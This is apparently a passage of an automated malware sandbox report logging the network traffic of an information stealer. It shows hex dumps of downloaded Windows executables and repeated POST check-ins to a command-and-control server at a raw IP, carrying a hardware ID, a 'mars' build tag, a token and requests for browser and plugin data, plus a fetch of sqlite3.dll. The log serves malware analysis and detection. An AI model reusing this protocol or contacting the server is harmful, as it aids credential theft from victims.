Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 11 Nov 2024 00:15:15 GMTContent-Type: application/octet-streamContent-Length: 3199488Last-Modified: Sun, 10 Nov 2024 23:53:41 GMTConnection: keep-aliveETag: "67314785-30d200"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 53 d3 15 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 4a 04 00 00 d6 00 00 00 00 00 00 00 e0 30 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 31 00 00 04 00 00 a1 28 31 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 a0 05 00 68 00 00 00 00 90 05 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 a1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 05 00 00 10 00 00 00 80 05 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 40 03 00 00 00 90 05 00 00 04 00 00 00 90 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 05 00 00 02 00 00 00 94 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 67 6a 75 72 63 7a 7a 7a 00 20 2b 00 00 b0 05 00 00 16 2b 00 00 96 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 77 68 61 72 6e 6b 78 00 10 00 00 00 d0 30 00 00 04 00 00 00 ac 30 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 30 00 00 22 00 00 00 b0 30 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 11 Nov 2024 00:15:41 GMTContent-Type: application/octet-streamContent-Length: 1847808Last-Modified: Sun, 10 Nov 2024 23:53:54 GMTConnection: keep-aliveETag: "67314792-1c3200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 40 22 00 00 00 00 00 00 a0 6a 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 d0 6a 00 00 04 00 00 7e cb 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 62 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 a0 24 00 00 00 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 30 2b 00 00 c0 24 00 00 02 00 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 6f 76 64 7a 76 73 66 00 a0 1a 00 00 f0 4f 00 00 96 1a 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 6d 62 6d 63 66 61 66 00 10 00 00 00 90 6a 00 00 04 00 00 00 0c 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 a0 6a 00 00 22 00 00 00 10 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 11 Nov 2024 00:15:55 GMTContent-Type: application/octet-streamContent-Length: 2767360Last-Modified: Sun, 10 Nov 2024 23:04:52 GMTConnection: keep-aliveETag: "67313c14-2a3a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 a0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 2a 00 00 04 00 00 e3 53 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 71 72 72 72 7a 66 6f 65 00 e0 29 00 00 a0 00 00 00 da 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 68 6e 7a 77 6b 68 6d 00 20 00 00 00 80 2a 00 00 04 00 00 00 14 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 a0 2a 00 00 22 00 00 00 18 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 11 Nov 2024 00:15:55 GMTContent-Type: application/octet-streamContent-Length: 1847808Last-Modified: Sun, 10 Nov 2024 23:53:54 GMTConnection: keep-aliveETag: "67314792-1c3200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 40 22 00 00 00 00 00 00 a0 6a 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 d0 6a 00 00 04 00 00 7e cb 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 62 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 a0 24 00 00 00 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 30 2b 00 00 c0 24 00 00 02 00 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 6f 76 64 7a 76 73 66 00 a0 1a 00 00 f0 4f 00 00 96 1a 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 6d 62 6d 63 66 61 66 00 10 00 00 00 90 6a 00 00 04 00 00 00 0c 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 a0 6a 00 00 22 00 00 00 10 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 11 Nov 2024 00:16:06 GMTContent-Type: application/octet-streamContent-Length: 1847808Last-Modified: Sun, 10 Nov 2024 23:53:54 GMTConnection: keep-aliveETag: "67314792-1c3200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 40 22 00 00 00 00 00 00 a0 6a 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 d0 6a 00 00 04 00 00 7e cb 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 62 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 a0 24 00 00 00 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 30 2b 00 00 c0 24 00 00 02 00 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 6f 76 64 7a 76 73 66 00 a0 1a 00 00 f0 4f 00 00 96 1a 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 6d 62 6d 63 66 61 66 00 10 00 00 00 90 6a 00 00 04 00 00 00 0c 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 a0 6a 00 00 22 00 00 00 10 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBGIEGCFHCFHIDHIJECAHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 32 36 34 36 44 34 37 37 31 42 43 34 31 35 38 31 33 35 32 33 36 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 41 2d 2d 0d 0a Data Ascii: ------EBGIEGCFHCFHIDHIJECAContent-Disposition: form-data; name="hwid"D2646D4771BC4158135236------EBGIEGCFHCFHIDHIJECAContent-Disposition: form-data; name="build"mars------EBGIEGCFHCFHIDHIJECA--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIDHDGCBFBKECBFHCAFHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 49 44 48 44 47 43 42 46 42 4b 45 43 42 46 48 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 38 66 39 36 37 38 65 32 66 37 66 64 39 30 61 66 65 32 61 31 33 31 39 35 32 37 39 63 31 61 63 37 62 38 62 62 37 61 37 31 37 30 35 36 65 30 66 34 62 61 36 63 66 32 36 65 38 61 30 34 31 65 30 35 32 31 39 32 62 38 30 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 48 44 47 43 42 46 42 4b 45 43 42 46 48 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 48 44 47 43 42 46 42 4b 45 43 42 46 48 43 41 46 2d 2d 0d 0a Data Ascii: ------EGIDHDGCBFBKECBFHCAFContent-Disposition: form-data; name="token"d8f9678e2f7fd90afe2a13195279c1ac7b8bb7a717056e0f4ba6cf26e8a041e052192b80------EGIDHDGCBFBKECBFHCAFContent-Disposition: form-data; name="message"browsers------EGIDHDGCBFBKECBFHCAF--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGCFBAFBFHJEBGCAEGHHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 43 46 42 41 46 42 46 48 4a 45 42 47 43 41 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 38 66 39 36 37 38 65 32 66 37 66 64 39 30 61 66 65 32 61 31 33 31 39 35 32 37 39 63 31 61 63 37 62 38 62 62 37 61 37 31 37 30 35 36 65 30 66 34 62 61 36 63 66 32 36 65 38 61 30 34 31 65 30 35 32 31 39 32 62 38 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 46 42 41 46 42 46 48 4a 45 42 47 43 41 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 46 42 41 46 42 46 48 4a 45 42 47 43 41 45 47 48 2d 2d 0d 0a Data Ascii: ------JDGCFBAFBFHJEBGCAEGHContent-Disposition: form-data; name="token"d8f9678e2f7fd90afe2a13195279c1ac7b8bb7a717056e0f4ba6cf26e8a041e052192b80------JDGCFBAFBFHJEBGCAEGHContent-Disposition: form-data; name="message"plugins------JDGCFBAFBFHJEBGCAEGH--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIEHIIIJDAAAAAAKECBFHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 38 66 39 36 37 38 65 32 66 37 66 64 39 30 61 66 65 32 61 31 33 31 39 35 32 37 39 63 31 61 63 37 62 38 62 62 37 61 37 31 37 30 35 36 65 30 66 34 62 61 36 63 66 32 36 65 38 61 30 34 31 65 30 35 32 31 39 32 62 38 30 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 2d 2d 0d 0a Data Ascii: ------FIEHIIIJDAAAAAAKECBFContent-Disposition: form-data; name="token"d8f9678e2f7fd90afe2a13195279c1ac7b8bb7a717056e0f4ba6cf26e8a041e052192b80------FIEHIIIJDAAAAAAKECBFContent-Disposition: form-data; name="message"fplugins------FIEHIIIJDAAAAAAKECBF--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJECGHJDBFIJJJKEHCBFHost: 185.215.113.206Content-Length: 6879Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFHCAEGCBFHJDGCBFHDAHost: 185.215.113.206Content-Length: 991Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBGHDGHCGHCAAKFIIECFHost: 185.215.113.206Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGDGCFBAEGDHJKEBGCBAHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 44 47 43 46 42 41 45 47 44 48 4a 4b 45 42 47 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 38 66 39 36 37 38 65 32 66 37 66 64 39 30 61 66 65 32 61 31 33 31 39 35 32 37 39 63 31 61 63 37 62 38 62 62 37 61 37 31 37 30 35 36 65 30 66 34 62 61 36 63 66 32 36 65 38 61 30 34 31 65 30 35 32 31 39 32 62 38 30 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 47 43 46 42 41 45 47 44 48 4a 4b 45 42 47 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 